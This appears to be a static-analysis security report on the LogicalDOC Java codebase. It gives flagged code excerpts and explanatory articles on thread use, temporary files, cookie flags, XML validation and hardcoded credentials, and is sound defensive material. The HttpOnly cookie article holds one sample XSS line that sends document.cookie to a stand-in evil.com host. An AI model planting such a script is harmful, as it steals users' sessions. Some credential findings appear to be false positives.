    public void openDatabaseConnection() {
        try {
            InitialContext ctx = new InitialContext();
            DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);
            conn = datasource.getConnection();
            ...
        } catch (NamingException ex) {...}
        catch (SQLException ex) {...}
    }
}

Java: Direct use of threads in a J2EE application
Severity: low
Language: Java
Short description: Direct use of threads is forbidden in J2EE applications as a potential error source. Thread management is a complicated task, and there is a high chance of synchronization errors when doing so manually. Debugging such errors is a waste of development resources.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionThread.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/FileUtil.java
Code:

578        for (int i = 0; i < 20; i++) {
579            FileUtils.deleteQuietly(file);
580            if (!file.exists())
581                break;
582            try {
583                Thread.sleep(1000);
584            } catch (InterruptedException e) {
585            }
586        }
587    }
588


File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/DocumentServiceImpl.java
Code:

218                            }
219                        }
220                    });
221
222                    // And launch it
223                    zipImporter.start();
224                } else {
225                    // Create the document history event
226                    History transaction = new History();
227                    transaction.setSession(session);
228                    transaction.setEvent(DocumentEvent.STORED.toString());

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/DocumentServiceImpl.java
Code:

197                    FileUtils.copyFile(file, destFile);
198
199                    final long userId = session.getUserId();
200                    final String sessionId = session.getId();
201                    // Prepare the import thread
202                    Thread zipImporter = new Thread(new Runnable() {
203                        public void run() {
204                            /*
205                             * Prepare the Master document used to create the
206                             * new one
207                             */
208                            Document doc = toDocument(metadata);
209                            doc.setTenantId(session.getTenantId());
210                            doc.setCreation(new Date());
211
212                            InMemoryZipImport importer = new InMemoryZipImport(doc);
213                            importer.process(destFile, parent, userId, sessionId);
214                            try {
215                                FileUtils.forceDelete(destFile);
216                            } catch (IOException e) {
217                                log.error("Unable to delete " + destFile, e);
218                            }
219                        }
220                    });
221
222                    // And launch it
223                    zipImporter.start();
224                } else {
225                    // Create the document history event

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchEngineServiceImpl.java
Code:

106                    throw new RuntimeException(t.getMessage(), t);
107                }
108            }
109        };
110
111        Thread recreateThread = new Thread(task);
112        recreateThread.start();
113
114        return;
115    }
116


File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchEngineServiceImpl.java
Code:

107                }
108            }
109        };
110
111        Thread recreateThread = new Thread(task);
112        recreateThread.start();
113
114        return;
115    }
116
117    @Override

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SystemServiceImpl.java
Code:

639
640        try {
641            for (Task task : manager.getTasks()) {
642                if (task.getName().equals(taskName)) {
643                    Thread thread = new Thread(task);
644                    thread.start();
645                    break;
646                }
647            }
648
649            return true;

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SystemServiceImpl.java
Code:

638        TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);
639
640        try {
641            for (Task task : manager.getTasks()) {
642                if (task.getName().equals(taskName)) {
643                    Thread thread = new Thread(task);
644                    thread.start();
645                    break;
646                }
647            }
648

Direct use of threads in a J2EE application

Direct use of threads is forbidden in J2EE applications as a potential error source. Thread management is a complicated task, and there is a high chance of synchronization errors when doing so manually. Debugging such errors is a waste of development resources.

Example

In this example, upon receiving a GET request, the servlet starts a new thread using the Thread.start() method:

Java
public void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    // Perform servlet tasks.
    ...

    // Create a new thread to handle background processing.
    Runnable r = new Runnable() {
            public void run() {
                // Process and store request statistics.
                ...
            }
        };
    new Thread(r).start();
}

Potential consequences

Direct use of threads in J2EE applications can lower overall code quality, creating further debugging and support problems.

Using the Thread class is often correlated with synchronization errors, such as race conditions and deadlocks. These errors are difficult to debug, and they can result in undefined system states or even a system shutdown.

Removal recommendations

When developing a J2EE project, we recommend against direct thread use. If background tasks must be performed asynchronously, we recommend using a thread scheduler and dispatcher such as Executors.

Using this, we can rewrite the example as such:

Java
private static final ExecutorService SERVICE = Executors.newCachedThreadPool();

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
    // Perform servlet tasks.
    ...
    // Process and store request statistics in database
    SERVICE.submit(
            new ProcessRequestInformationRunnable(
                collectRequestInformation(req)
            )
    );
}


Java: Failure to remove temporary files after use
Severity: low
Language: Java
Short description: If the application creates temporary files but does not delete them afterwards, a huge number of them can accumulate over time. Temporary file buildup can consume all available disk space and, as a result, cause a performance drop or even a system shutdown. Temporary files can also contain critical information, which could give a malicious user access to confidential data that could later be used to attack the system.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonLeavingTemporaryFile.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/document/pdf/PdfConverterManager.java
Code:

    164     * Write a document into a temporary file.
    165     * 
    166     * @throws IOException
    167     */
    168    private File writeToFile(Document document, String fileVersion) throws IOException {
    169        File target = File.createTempFile("scr", "." + FilenameUtils.getExtension(document.getFileName()));
    170        String fver = getSuitableFileVersion(document, fileVersion);
    171        String resource = storer.getResourceName(document.getId(), fver, null);
    172        storer.writeToFile(document.getId(), resource, target);
    173        return target;
    174    }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/document/thumbnail/ThumbnailManager.java
Code:

    168     * Write a document into a temporary file.
    169     * 
    170     * @throws IOException
    171     */
    172    private File writeToFile(Document document, String fileVersion) throws IOException {
    173        File target = File.createTempFile("scr", "." + FilenameUtils.getExtension(document.getFileName()));
    174        String fver = getSuitableFileVersion(document, fileVersion);
    175        String resource = storer.getResourceName(document.getId(), fver, null);
    176        storer.writeToFile(document.getId(), resource, target);
    177        return target;
    178    }

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/LogDownload.java
Code:

    142                }
    143
    144                // Now create a copy of the configuration and store it in thee
    145                // zip file
    146                ContextProperties cp = new ContextProperties();
    147                File buf = File.createTempFile("context", ".properties");
    148                OrderedProperties prop = new OrderedProperties();
    149                for (String key : cp.getKeys()) {
    150                    if (key.contains("password"))
    151                        continue;
    152                    else

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/LogDownload.java
Code:

    108
    109    /**
    110     * Prepare all log files plus the context.properties in one single zip.
    111     */
    112    private File prepareAllLogs(HttpServletResponse response) {
    113        File tmp = null;
    114
    115        try {
    116            tmp = File.createTempFile("logs", ".zip");
    117            ZipOutputStream out = new ZipOutputStream(new FileOutputStream(tmp));
    118

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/DocumentServiceImpl.java
Code:

    1116            mail.setSentDate(new Date());
    1117            mail.setSubject(email.getSubject());
    1118            mail.setUsername(session.getUsername());
    1119
    1120            // Needed in case the zip compression was requested by the user
    1121            File zipFile = null;
    1122
    1123            if (email.isSendAsTicket()) {
    1124                // Prepare a new download ticket
    1125                Ticket ticket = prepareTicket(email.getDocIds()[0], session.getUser());
    1126

Failure to remove temporary files after use

If the application creates temporary files but does not delete them afterwards, a huge number of them can accumulate over time. Temporary file buildup can fill the disk entirely and, as a result, degrade performance or even shut the system down. Temporary files can also contain critical information, which could give a malicious user access to confidential data that could later be used in an attack on the system.

Example

In this example, the application creates a temporary file and does not delete it after use:

Java:
    ...
    File file = File.createTempFile( prefix, suffix );
    ...
    System.out.println("Writing to " + file.getAbsolutePath());
    ...

This code can be used, for example, in a mail client. Creating a separate file for reading an attachment is a good idea, especially for large attachments. However, since the file is not deleted when the program exits, the temporary file keeps occupying disk space, and the system administrator has to delete it manually.

After the user has finished working with the application, the file also remains accessible to other users of the system.


Potential consequences

This vulnerability can lead to the following:

• Compromising application data;

• Disk space overflow and, as a result, system malfunction or shutdown;

• System information leak that can be used for a later attack.

Removal recommendations

We recommend deleting temporary files as soon as work with them finishes, or at the latest when the application shuts down.

Standard Java libraries have several tools for working with temporary files:

• In the java.io [1] package:

  • The File.deleteOnExit() method marks the file for deletion. When the virtual machine starts its shutdown procedure, it will delete the file;

  • You can use File.delete() to delete the file manually as soon as it is no longer needed.

• In the java.nio [2] package:

  • When opening a file stream, you can use the StandardOpenOption.DELETE_ON_CLOSE flag, which deletes the file when the close() method is called. If the application never closes the stream, the file is deleted on virtual machine shutdown (and, where possible, during abnormal shutdowns as well);

  • The file can be deleted manually after use with the Files.delete(Path) and Files.deleteIfExists(Path) methods.

JVM also gives an overall resource cleanup mechanism on system shutdown, called Shutdown Hooks [3]. This mechanism allows you to create a procedure that will be launched on JVM shutdown. In this case, we can do this:

Java:
    Runtime.getRuntime().addShutdownHook(new Thread() {
        public void run() {
            // cleanup code
        }
    });
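The following is an added example (not code from the report or from LogicalDOC) that combines the three recommendations above: explicit deletion in a finally block, DELETE_ON_CLOSE for read-once files, and a shutdown hook that sweeps whatever is still pending. It assumes Java 9 or later for InputStream.readAllBytes(); the Converter interface and the "scr" prefix are illustrative.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.nio.file.StandardOpenOption;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

/** Added example: temporary-file handling that always cleans up after itself. */
public final class TempFileDemo {

    // Temp files currently alive; the shutdown hook removes any that were not
    // deleted in time (e.g. the JVM was stopped in the middle of a conversion).
    private static final Set<Path> LIVE = ConcurrentHashMap.newKeySet();

    static {
        Runtime.getRuntime().addShutdownHook(new Thread(() -> {
            for (Path p : LIVE) {
                try { Files.deleteIfExists(p); } catch (IOException ignored) { }
            }
        }));
    }

    /** Hypothetical converter callback standing in for the PDF/thumbnail code. */
    @FunctionalInterface
    public interface Converter {
        byte[] convert(Path input) throws IOException;
    }

    /**
     * Copies the document stream to a temp file, runs the converter on it and
     * deletes the file in every case: success, exception, or JVM shutdown.
     */
    public static byte[] convertViaTempFile(InputStream document, String extension,
                                            Converter converter) throws IOException {
        // Files.createTempFile picks a random name and, on POSIX systems, creates
        // the file with owner-only (rw-------) permissions, so other local users
        // cannot read the document even while the file exists.
        Path tmp = Files.createTempFile("scr", "." + extension);
        LIVE.add(tmp);
        try {
            Files.copy(document, tmp, StandardCopyOption.REPLACE_EXISTING);
            return converter.convert(tmp);
        } finally {
            // Delete as soon as the work is done, not only at JVM exit.
            Files.deleteIfExists(tmp);
            LIVE.remove(tmp);
        }
    }

    /** Reads a temp file through a stream that removes the file when it is closed. */
    public static String readAndDiscard(Path tmp) throws IOException {
        try (InputStream in = Files.newInputStream(tmp, StandardOpenOption.DELETE_ON_CLOSE)) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample input standing in for a stored document.
        byte[] sample = "constructed sample document".getBytes(StandardCharsets.UTF_8);

        byte[] out = convertViaTempFile(new ByteArrayInputStream(sample), "txt", Files::readAllBytes);
        System.out.println("converted: " + new String(out, StandardCharsets.UTF_8));
        System.out.println("pending temp files: " + LIVE.size());   // 0: cleaned up in finally

        Path scratch = Files.createTempFile("scr", ".txt");
        Files.write(scratch, sample);
        System.out.println("read back: " + readAndDiscard(scratch));
        System.out.println("still on disk? " + Files.exists(scratch)); // false: DELETE_ON_CLOSE
    }
}
```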

Java: HttpOnly Cookies
Severity: low
Language: Java
Short description: If the web application uses cookies that are available to browser scripts, and the application is vulnerable to Cross-Site Scripting (XSS) attacks, the malicious user could easily access the victim's cookies and use them to their own ends.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonHttpOnlyCookie.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/SessionManager.java
Code:

    291    public void saveSessionId(HttpServletRequest request, HttpServletResponse response, String sessionId) {
    292        request.setAttribute(PARAM_SID, sessionId);
    293        if (request.getSession(false) != null)
    294            request.getSession(false).setAttribute(PARAM_SID, sessionId);
    295
    296        Cookie sidCookie = new Cookie(COOKIE_SID, sessionId);
    297        response.addCookie(sidCookie);
    298    }
    299
    300    /**
    301     * Saves the session identifier in the request

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationFailureHandler.java
Code:

    40        else
    41            failureUrl.append("?");
    42        failureUrl.append("failure=");
    43        failureUrl.append(exception.getMessage());
    44
    45        Cookie failureCookie = new Cookie(COOKIE_LDOC_FAILURE, exception.getMessage());
    46        response.addCookie(failureCookie);
    47        
    48        log.info("Authentication was unsuccesful, redirecting to " + failureUrl.toString());
    49        response.sendRedirect(failureUrl.toString());
    50    }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java
Code:

    32    public void onAuthenticationSuccess(HttpServletRequest request, HttpServletResponse response,
    33            Authentication authentication) throws IOException, ServletException {
    34        String param = request.getParameter(PARAM_SUCCESSURL);
    35        LDAuthenticationToken token = (LDAuthenticationToken) authentication;
    36
    37        Cookie sidCookie = new Cookie(LDAuthenticationToken.COOKIE_SID, token.getSid());
    38        response.addCookie(sidCookie);
    39
    40        if (param != null) {
    41            StringBuffer successUrl = new StringBuffer(param);
    42            log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/charset/CharsetRecog_sbcs.java
Code:

    1122    
    1123    abstract static class CharsetRecog_IBM420_ar extends CharsetRecog_sbcs
    1124    {
    1125        //arabic shaping class, method shape/unshape
    1126        //protected static ArabicShaping as = new ArabicShaping(ArabicShaping.LETTERS_UNSHAPE);
    1127        protected byte[] prev_fInputBytes = null;
    1128
    1129        protected static byte[] byteMap = {
    1130    /*                 -0           -1           -2           -3           -4           -5           -6           -7           -8           -9           -A           -B           -C           -D           -E           -F   */
    1131    /* 0- */    (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, 
    1132    /* 1- */    (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, 

HttpOnly Cookies

If the web application uses cookies that are available to browser scripts, and the application is vulnerable to Cross-Site Scripting (XSS) attacks, the malicious user could easily access the victim's cookies and use it to their own ends.

Example

Let's take a look at a web application that functions as a bulletin board. The user is authorized, and in order to maintain their session, their account information is stored in a cookie, which is sent to the server with every request.

Java:
    @Override
    protected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException
    {
        resp.addCookie( new Cookie( "Session", sessionId ) );
        resp.addCookie( new Cookie( "User", user) );
        ...
    }

If the application is vulnerable to XSS attacks [1], the malicious user could add their own script to the page. For example:

JavaScript:
    document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />');

This script will forward the victim's cookies to the malicious user's site. Using this data, the malicious user could imitate the victim's session, and access the application from their account.

Potential Consequences

Cookie theft could have the following consequences:

• accessing the victim's confidential information;

• giving the malicious user the ability to log in to the application as the victim, sending false information, installing malicious scripts or links to malicious sites.

Removal Recommendations

• It is necessary to protect the application from XSS attacks [2] first.

• Modern browsers have a special mechanism in place to prevent access to the user's stored cookies by the page's scripts. This is called an HTTP-only cookie. In order to protect the cookie data from client-side scripting, you need to mark them as httpOnly. This can be done in several ways [3]:

  • Manually, by calling the cookie.setHttpOnly(true) method;

  • Marking all the session-level cookies in web.xml:

    Xml:
        <session-config>
            <cookie-config>
                <http-only>true</http-only>
            </cookie-config>
        </session-config>

  • Configuring the application server to mark all cookies as httpOnly (most servers support this).

Note: setting the httpOnly tag does not fully guarantee the security of the cookie data, since it is possible to bypass it. The only way to completely protect it is by securing the application against all XSS attacks. However, we still recommend using the above mechanism as a second line of defense.
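As an added example (not the report's or LogicalDOC's code), this is how the saveSessionId() pattern flagged above looks with the recommendation applied: the session cookie is marked HttpOnly, gets the Secure flag when the request came over TLS, and is scoped to the application path. It assumes the Servlet 3.0+ API (setHttpOnly) and uses a placeholder cookie name.

```java
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Added example: issuing the session cookie so that page scripts cannot read it. */
public final class SessionCookies {

    /** Placeholder for the application's own session cookie / attribute name. */
    public static final String COOKIE_SID = "sid";

    /**
     * Builds the session cookie the way the recommendation describes: not readable
     * through document.cookie, sent only over TLS when the request itself arrived
     * over TLS, and limited to this application's path.
     */
    public static Cookie sessionCookie(HttpServletRequest request, String sessionId) {
        Cookie c = new Cookie(COOKIE_SID, sessionId);
        c.setHttpOnly(true);               // Servlet 3.0+: adds the HttpOnly attribute
        c.setSecure(request.isSecure());   // Secure flag whenever the app is served over HTTPS
        String ctx = request.getContextPath();
        c.setPath(ctx.isEmpty() ? "/" : ctx);
        c.setMaxAge(-1);                   // browser-session cookie, not persisted to disk
        return c;
    }

    /** Hardened counterpart of the flagged saveSessionId(): same behaviour, safer cookie. */
    public static void saveSessionId(HttpServletRequest request, HttpServletResponse response,
                                     String sessionId) {
        request.setAttribute(COOKIE_SID, sessionId);
        if (request.getSession(false) != null) {
            request.getSession(false).setAttribute(COOKIE_SID, sessionId);
        }
        response.addCookie(sessionCookie(request, sessionId));
    }

    /**
     * Guard usable from a unit test or a response filter: a session cookie that is
     * still script-readable, or unscoped, is rejected before it leaves the server.
     */
    public static boolean isHardened(Cookie c) {
        return c.isHttpOnly() && c.getPath() != null && !c.getPath().isEmpty();
    }
}
```

The web.xml setting shown above achieves the same for the container-managed JSESSIONID, but cookies the application creates itself, as in the flagged code, need setHttpOnly(true) explicitly.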

Java: Missing XML document schema validation
Severity: low
Language: Java
Short description: We often use XML documents to pass or store application data. If documents received from untrusted sources are not checked against XSD or DTD schemas, the malicious user can pass unexpected or malicious data to the application.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/XmlValidationMissing.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/AbiWordParser.java
Code:

    69    }
    70
    71    @Override
    72    public void internalParse(InputStream input) {
    73        try {
    74            SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();
    75            saxParserFactory.setValidating(false);
    76            SAXParser saxParser = saxParserFactory.newSAXParser();
    77            XMLReader xmlReader = saxParser.getXMLReader();
    78            xmlReader.setFeature("http://xml.org/sax/features/validation", false);
    79            xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/KOfficeParser.java
Code:

    68    }
    69
    70    @Override
    71    public void internalParse(InputStream input) {
    72        try {
    73            SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();
    74            saxParserFactory.setValidating(false);
    75            SAXParser saxParser = saxParserFactory.newSAXParser();
    76            XMLReader xmlReader = saxParser.getXMLReader();
    77            xmlReader.setFeature("http://xml.org/sax/features/validation", false);
    78            xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/OpenOfficeParser.java
Code:

    88                Thread.sleep(4000);
    89            } catch (Throwable t) {
    90
    91            }
    92
    93            SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();
    94            saxParserFactory.setValidating(false);
    95            SAXParser saxParser = saxParserFactory.newSAXParser();
    96            XMLReader xmlReader = saxParser.getXMLReader();
    97            xmlReader.setFeature("http://xml.org/sax/features/validation", false);
    98            xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/XMLParser.java
Code:

    36    public void internalParse(InputStream input) {
    37        try {
    38            CharArrayWriter writer = new CharArrayWriter();
    39            ExtractorHandler handler = new ExtractorHandler(writer);
    40
    41            SAXParserFactory factory = SAXParserFactory.newInstance();
    42            SAXParser parser = factory.newSAXParser();
    43            XMLReader reader = parser.getXMLReader();
    44            reader.setContentHandler(handler);
    45            reader.setErrorHandler(handler);
    46

Missing XML document schema validation

We often use XML documents to pass or store application data. If documents received from untrusted sources are not checked against XSD or DTD schemas, the malicious user can pass unexpected or malicious data to the application.

Example

Let’s take a look at a code fragment that loads and analyzes an XML file received from the user:

Java:
    // Read DOM
    try {
        ...
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating( false );
        ....
        c_dom = factory.newDocumentBuilder().parse( xmlFile );
    } catch(Exception ex) {
        ...
    }

In general, insufficient XML validation can lead to a parser error, which interrupts the normal flow of the system. If the application's error handling is not sufficiently robust, the malicious user can obtain critical system information, or shut the system down completely [1].


If the document is then transformed, the malicious user can add executable code to it that will be run on the server [2].

Potential consequences

This vulnerability can lead to the following:

• Data corruption;

• Unpredictable program behavior;

• Granting the malicious user critical system information;

• Running executable code.

Removal recommendations

Before parsing XML files from untrusted sources, we recommend running the file through a validator. To do so, you need to develop a document schema, which is a file in a particular format that defines the XML document structure acceptable to the application [3]. This schema is loaded into the validator, and the XML is then compared against it [4], like so:

Java:
    SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
    Schema schema = factory.newSchema(new File("mySchema.xsd"));
    Validator validator = schema.newValidator();

    DocumentBuilder parser = DocumentBuilderFactory.newInstance().newDocumentBuilder();
    Document document = parser.parse(new File("myXMLDocument.xml"));
    validator.validate(new DOMSource(document));

You can also use a second type of XML validation: Document Type Definition (DTD) [5]. When using it, keep these things in mind:

• First of all, the DTD format is considered outdated, and the W3C does not recommend using it;

•Second of all, we recommend using external DTD, since internal ones (saved in the document itself) can only verify the document’s integrity, but not its applicability to the application.
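The snippet above validates a DOM after it has already been built. As an added example (not code from the report or from LogicalDOC), the following applies the same XSD check to the SAX-style internalParse(InputStream) shape used by the flagged parsers, so the document is validated while it is read and rejected before any content reaches the application. The schema, the <doc>/<title> format and the sample documents are constructed for the example; the load-external-dtd feature is the one the flagged code already sets.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

/** Added example: schema-validating SAX parse of a document from an untrusted source. */
public final class ValidatingParse {

    // Constructed schema: exactly one <doc> holding a required <title> and an optional <body>.
    static final String XSD =
        "<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema' elementFormDefault='qualified'>"
      + " <xs:element name='doc'><xs:complexType><xs:sequence>"
      + "  <xs:element name='title' type='xs:string'/>"
      + "  <xs:element name='body' type='xs:string' minOccurs='0'/>"
      + " </xs:sequence></xs:complexType></xs:element>"
      + "</xs:schema>";

    private static final Schema SCHEMA;
    static {
        try {
            SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            SCHEMA = sf.newSchema(new StreamSource(new StringReader(XSD)));
        } catch (SAXException e) {
            throw new IllegalStateException("schema does not compile", e);
        }
    }

    /**
     * Parses the XML, validating against SCHEMA as it streams, and returns the text of
     * <title>. Any validation error or warning aborts the parse with SAXParseException.
     */
    public static String parseTitle(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setValidating(false);          // DTD validation off: the XSD supplied below is used instead
        f.setSchema(SCHEMA);             // validation errors are reported to the parse handler
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        SAXParser parser = f.newSAXParser();

        final StringBuilder title = new StringBuilder();
        DefaultHandler handler = new DefaultHandler() {
            boolean inTitle;
            @Override public void startElement(String uri, String local, String qName, Attributes a) {
                inTitle = "title".equals(local);
            }
            @Override public void endElement(String uri, String local, String qName) {
                inTitle = false;
            }
            @Override public void characters(char[] ch, int start, int len) {
                if (inTitle) title.append(ch, start, len);
            }
            // DefaultHandler swallows warnings and recoverable errors by default;
            // for untrusted input every deviation from the schema must be fatal.
            @Override public void warning(SAXParseException e) throws SAXException { throw e; }
            @Override public void error(SAXParseException e) throws SAXException { throw e; }
        };
        parser.parse(new InputSource(new StringReader(xml)), handler);
        return title.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample documents.
        String good = "<doc><title>Quarterly report</title><body>text</body></doc>";
        String bad  = "<doc><body>no title here</body><extra/></doc>";   // violates the schema

        System.out.println("accepted: " + parseTitle(good));            // Quarterly report
        try {
            parseTitle(bad);
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());           // cvc-complex-type error
        }
    }
}
```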

Java: User Data Leak Between Sessions
Severity: low
Language: Java
Short description: If the user session data is written in the singleton object fields (such as servlets or controllers) or in the fields of public pool objects, a race situation might develop. In this case, the data from one session will be available to another one.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonXre.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-webdav/src/main/java/com/logicaldoc/webdav/web/WebdavServlet.java
Code:

    46
    47    public static final String INIT_PARAM_RESOURCE_CONFIG = "resource-config";
    48
    49    public static final String CTX_ATTR_RESOURCE_PATH_PREFIX = "jackrabbit.webdav.simple.resourcepath";
    50
    51    private String resourcePathPrefix;
    52
    53    private String authenticate_header;
    54
    55    private LockManager lockManager;
    56

User Data Leak Between Sessions

If the user session data is written in the singleton object fields (such as servlets or controllers) or in the fields of public pool objects, a race situation might develop. In this case, the data from one session will be available to another one.

Example

Let's take a look at a guestbook. The user enters their name and a message, and the data is sent to the server where it is processed. In response, the application sends the user a greeting and a small thank you message.

Java:
    public class GuestBook extends HttpServlet {
        String name;

        protected void doPost (HttpServletRequest req, HttpServletResponse res) {
            name = req.getParameter("name");
            ...
            out.println(name + ", thank you for joining us!");
        }
    }

In single-threaded mode, this application will work as designed. However, note that the user name is written into a class field. In a multithreaded environment, if two users send their data at the same time, we can have a race situation [1]. Let's suppose that two users, John and Peter, access the guestbook simultaneously. The application then does the following:

Java:
    Thread 1: GuestBook.name = "John"
    Thread 2: GuestBook.name = "Peter"
    ...
    Thread 1: out.println("Peter" + ", thank you for joining us!");
    Thread 2: out.println("Peter" + ", thank you for joining us!");

Both users would receive the same message.

Potential Consequences

Information Leak.

Removal Recommendations

• We recommend keeping session data in local variables, since they are safe for multithreading;

• There is an interface, HttpSession [2], that is designed for storing session data and simplifies the session life cycle.

Java: Using Hardcoded Credentials
Severity: low
Language: Java
Short description: The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonHardcodedPassword.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/User.java
Code:

    38
    39    private String username = "";
    40
    41    private String password = "";
    42
    43    private String passwordmd4 = "";
    44
    45    private String name = "";
    46
    47    private String firstName = "";
    48

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/Constants.java
Code:

    6
    7    // The currenly logged user identifier
    8    public static final String AUTH_USERID = "authUserId";
    9
    10    // The currenly logged user password
    11    public static final String AUTH_PASSWORD = "authPassword";
    12
    13    // The current user session
    14    public static final String USER_SESSION = "UserSession";
    15
    16    // The language of the currently logged user

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/Constants.java
Code:

    132
    133    public static final String COOKIE_SAVELOGIN = "ldoc-savelogin";
    134
    135    public static final String COOKIE_USER = "ldoc-user";
    136
    137    public static final String COOKIE_PASSWORD = "ldoc-password";
    138
    139    public static final String COOKIE_VERSION = "ldoc-version";
    140
    141    public static final String COOKIE_SID = "ldoc-sid";
    142    

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/personal/ChangePassword.java
Code:

    28 * 
    29 * @author Marco Meschieri - Logical Objects
    30 * @since 6.0
    31 */
    32 public class ChangePassword extends Window {
    33    private static final String PASSWORD = "password";
    34
    35    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    36
    37    private static final String NEWPASSWORD = "newpassword";
    38

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/personal/ChangePassword.java
Code:

    32 public class ChangePassword extends Window {
    33    private static final String PASSWORD = "password";
    34
    35    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    36
    37    private static final String NEWPASSWORD = "newpassword";
    38
    39    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    40
    41    public ChangePassword(final GUIUser user) {
    42        super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/personal/ChangePassword.java
Code:

    30 * @since 6.0
    31 */
    32 public class ChangePassword extends Window {
    33    private static final String PASSWORD = "password";
    34
    35    private static final String NEWPASSWORDAGAIN = "newpasswordagain";
    36
    37    private static final String NEWPASSWORD = "newpassword";
    38
    39    private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);
    40

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/security/SetPassword.java
Code:

    29 * @since 6.0
    30 */
